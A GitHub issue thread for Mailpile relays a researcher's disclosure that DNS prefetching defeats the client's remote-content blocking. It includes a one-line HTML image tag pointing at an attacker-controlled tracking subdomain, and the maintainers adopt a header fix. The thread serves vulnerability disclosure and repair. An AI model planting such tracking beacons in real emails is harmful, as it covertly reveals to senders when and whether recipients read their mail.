### ISSUE TITLE
Block DNS-based view tracking

### ISSUE THREAD

**Issue by BjarniRunar** [mailpile/Mailpile#2006]
(copied from e-mail)

Dear MailPile Devs,

In the scope of academic research within the efail project, in
cooperation with Ruhr-University Bochum and FH Münster, Germany we
systematically analyzed MailPile for `web bugs' and other backchannels
which have an impact on the user's privacy. The results are as follows.

*** Introduction ***

It is well known that spammers abuse `web bugs' -- 1x1 pixel images in
HTML emails -- to track if their mails to a certain address are actually
read. To respect the privacy of their customers most email clients, by
default, block external content. However, remote content blocking is
broken in MailPile because modern browsers apply DNS prefetching.

*** The Impact ***

The issue allows the sender of an email to leak information such as:

- if and when the mail has been read
- the number of users on a mailing list

*** The Bypass ***

The following HTML email triggers a DNS request to the DNS server
responsible for tracking-id.attacker.com when the email is opened in
MailPile (without any user interaction required):

    <img src="http://tracking-id.attacker.com/">

Note that it is easy to set up a DNS server controlled by the spammer
responsible for her own domain, attacker.com, and all its subdomains.

*** Mitigation ***

Setting the `X-DNS-Prefetch-Control: off' header should fix the issue.

Feel free to contact me for any questions.

Greetings,
Jens

**Comment by BjarniRunar** [comment]
This is easy enough to fix, we just need to add the X-DNS-Prefetch-Control header to the standard headers in `mailpile/httpd.py`.  Leaving here as low hanging fruit for a week or two, but I'll probably fix this soon myself if nobody else picks this up.

**Comment by 091338** [comment]
It is really a low hanging fruit (provided that I've wrote it well that is; now just to see how to push this back to you now)

**Comment by BjarniRunar** [comment]
Thank you for fixing this!
